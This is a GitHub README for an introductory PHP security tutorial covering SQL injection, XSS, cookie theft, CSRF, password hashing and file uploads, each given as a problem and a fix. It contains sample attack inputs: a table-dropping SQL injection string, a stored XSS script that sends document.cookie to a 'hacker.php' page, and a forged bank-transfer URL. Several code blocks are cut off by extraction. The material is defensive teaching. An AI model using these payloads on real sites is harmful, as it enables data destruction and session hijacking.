https://github.com/msanvarov/php-security

🔐 basics on making php applications secure
https://github.com/msanvarov/php-security

errors exposing-directories php php-security sql-injection ssl-certificates xsrf xss-attacks

Last synced: about 2 months ago
JSON representation

🔐 basics on making php applications secure

• Host: GitHub
• URL: https://github.com/msanvarov/php-security
• Owner: msanvarov
• Created: 2019-01-20T00:33:49.000Z (almost 6 years ago)
• Default Branch: master
• Last Pushed: 2019-10-11T13:48:09.000Z (about 5 years ago)
• Last Synced: 2024-10-12T02:53:21.345Z (2 months ago)
• Topics: errors, exposing-directories, php, php-security, sql-injection, ssl-certificates, xsrf, xss-attacks
• Language: PHP
• Homepage:
• Size: 104 KB
• Stars: 19
• Watchers: 2
• Forks: 6
• Open Issues: 1
• Metadata Files:
  • Readme: README.md

Awesome Lists containing this project

README

        

# 💻 PHP Security

## 🏃 Get Latest PHP

Try to make sure to have the latest PHP versions installed as they come with updates and features that can help prevent major security flaws. You can download the [current stable release](https://www.php.net/downloads.php)

---

## 💉 SQL Injection

**Note**: The example discussed below can be found in the [sql-injection folder](https://github.com/msanvarov/php-security/tree/master/sql-injection)

An SQL injection is the most common attack a developer is bound to experience. A single query can compromise a whole application. In an SQL injection attack, the attacker tries to alter the data written to the database via malicious queries.

Suppose your PHP application processes user data based on input to generate SQL queries, and suddenly, an anonymous attacker secretly injects a malicious SQL query in the input field.

These are common problems that I have noticed in PHP based web applications that permit this dangerous act:

### 🔥 Problem: No Escape on Forms

Let's assume that you create a simple HTML form to take in user data.

```HTML

  Email:


  

  


  

```

**On the client side, nothing is wrong**, where the **problem lies is in how the server interprets this input data.** Let's explore what usually happens on the server side:

```PHP

// in action_page.php

query("SELECT * FROM users WHERE email = '{$email}'");

    // for PDO

    if ($query->rowCount())

    {

        echo "found an email address!";

    }

    // for MYSQL

    if ($query->num_rows)

    {

        echo "found an email address!";

    }

}

// ... hidden body of the form

```

😔 The code above can seem normal but it is extremely flawed.

If I was to execute an SQL query attack then I could use the following line:

```text

// past this into the email input

'; DROP TABLE posts; --'

// translates to the following query:

"SELECT * FROM users WHERE email = ''; DROP TABLE posts; --'");

```

This would be enough to drop a table.

More examples:

Let's say you have another HTML form with a username field.

```HTML

  Username:


  

  


  

```

Then on the server, if the input from the username field was to be processed in this way:

```PHP

prepare("SELECT * FROM users WHERE email = :email ");

$query->execute(array('email'=>$email));

// for MYSQL

$email = $mysqli->real_escape_string($email);

 $con->query("SELECT * FROM users WHERE email = '($email)'");

```

---

## ⛔ Errors

Once you have developed a web application that ready to go into production. **The most important thing you must do is disable the display of errors because hackers might get valuable information from debug errors.**

### 🔥 Problem: Stealing Information from Code Errors in Production

Fatal errors provide information about problems with code that can hold keys to sensitive information like database names, passwords, usernames, etc.

Therefore when going live, make sure to turn PHP errors off.

### 🧯 Fix: Create Loggers and Modify PHP Settings

If server permits, changing the 'display-errors' value in the php.ini file would be beneficial.

```text

display_errors=Off

```

Can set specific log location. **Might be tricky if the server paths are unknown**:

```text

log_errors=On

error_log=/var/log/httpd/php_scripts_error.log

```

OR

- Manually Disabling Errors in PHP

```PHP

alert('test');

$search = $_GET['search'] ?? null;

// search is now alert('test');

echo 'Search results for '.$search;

```

OR:

The following example is under the [XSS folder](https://github.com/msanvarov/php-security/tree/master/xss)

Let's assume we have some form in our application. Performing the following task: ![alt text](xss/main.png)

Text entered in the input field:

```text

You are getting redirected and hacked!

window.location =

 'http://localhost/security/xss/hacker.php?cookie='+escape(document.cookie);

```

On submit, each time a user navigates to the comment page, the malicious script will execute directing the user to anywhere the hacker has specified 🚧.

### 🧯 Fix: HTMLSPECIALCHARS and ENT_QUOTES for Sanitization

Simply employ the `htmlspecialchars`, and `ENT_QUOTES` method on the post body to prevent injecting js into the database. These are built-in PHP methods to help sanitize input.

```PHP

// htmlspecialchars sanitization

$search = htmlspecialchars($search, ENT_QUOTES, 'UTF-8');

echo 'Search results for '.$search;

// ent_quotes sanitization

$body =  htmlspecialchars($_POST['body'], ENT_QUOTES);

```

### 🔥 Problem: Stealing Cookies

It can be lethal if combined with an XSS attack, where cookies of users can be stolen (refer back to the XSS folder files hacker.php and mycookies.text).

Assume that the htmlspecialchars method is not used and the XSS problem still exists.

A more damaging attack would be to redirect any user to a PHP file that steals cookies

This is a simple implementation of grabbing cookies from users. The malicious file meant to to steal cookies:

```PHP

    

    Document

    
Page not working


```

If the hacker was to write the following comment in the form then each user accessing the comment section would be redirected to a file that steals their cookies.

This is something that can be used to do so:

```HTML

You are getting redirected and hacked!

window.location =

 'http://localhost/security/xss/hacker.php?cookie='+escape(document.cookie);

```

### 🧯 Fix: Extra Flags When Setting Cookies

When [setting cookies](https://www.php.net/manual/en/function.setcookie.php) make sure that you select the additional options like the secure, httponly, and make it available for a limited time.

```PHP

getTimestamp(), '/', null, null, true ); // expires 1 day after initialization

```

---

## 🔑 Passwords

An example can be found in the [password folder](https://github.com/msanvarov/php-security/tree/master/password)

### 🔥 Problem: Improperly hashing passwords

Hashing passwords is a safer bet than not hashing passwords at all as hackers can expose sensitive information if passwords are not secured properly. But the idea of using any hashing algorithm is not effective as there are still proper ways of hashing passwords for guaranteed security.

### 🧯 Fix: Hash Passwords to Prevent Vulnerabilities

If you are using anything other than the password_hash method provided by php, like sha-1, sha-256, sha-512, md5, you are still risking data theft due to brute force.

(when using password_hash please use without providing your salt)

```PHP

// Create the hash on account creation

 GET http://bank.com/transfer.do?acct=TIM&amount=100 HTTP/1.1

Now if someone wants to exploit the web application they will change the URL with name and amount like this

> http://bank.com/transfer.do?acct=Sandy&amount=100000

Now, this URL can be sent via email in any file, an image, etc. and the attacker might ask you to download the file or click on the image. And as soon as you do that, you instantly end up sending a huge amount of money you never know about.

### 🧯 Fix: Ajax Operations Instead of Static Requests

When performing data manipulations, make sure to make functions like deleting, creating, inserting, etc. as ajax requests so that a hacker can't just manipulate the HTML to cause harm.

Plus, you can check for the REQUEST type and make sure that it is a POST request.

1. Insert a hidden value-token into the form:

```HTML

```

2. Generate a token for each session

```PHP

` tag contains the property enctype=”multipart/form-data”.

Validate the file type to filter for JS or other programming language files.

```PHP

buffer($fileContents);

```

When using a framework such as CI or Laravel, developers get the luxury of having pre-defined methods to validate files.

A typical solution to a multipart form:

HTML:

```HTML

   File: 

   

```

PHP:

```PHP

 $error) {

   if ($error == UPLOAD_ERR_OK) {

       $tmpName = $_FILES['pictures']['tmp_name'][$key];

       $name = basename($_FILES['pictures']['name'][$key]);

       move_uploaded_file($tmpName, "/var/www/project/uploads/$name");

   }

}

```

Properly declaring the `UPLOAD_ERR` and `basename()` may prevent directory traversal attacks, but few other validations – like file size, file rename, and store uploaded files in private location – are also required to strengthen the security of the applications.

---

## 📃 SSL Certificates For HTTPS

All the modern browsers like Google Chrome, Opera, Firefox and others, recommend using HTTPS protocol for web applications. HTTPs provides a secured and encrypted accessing channel for untrusted sites. You must include HTTPS by installing an SSL certificate on your website. It also strengthens your web applications against XSS attacks and prevents hackers to read transported data using codes.

---

References:

https://www.cloudways.com/blog/php-security/#securityissues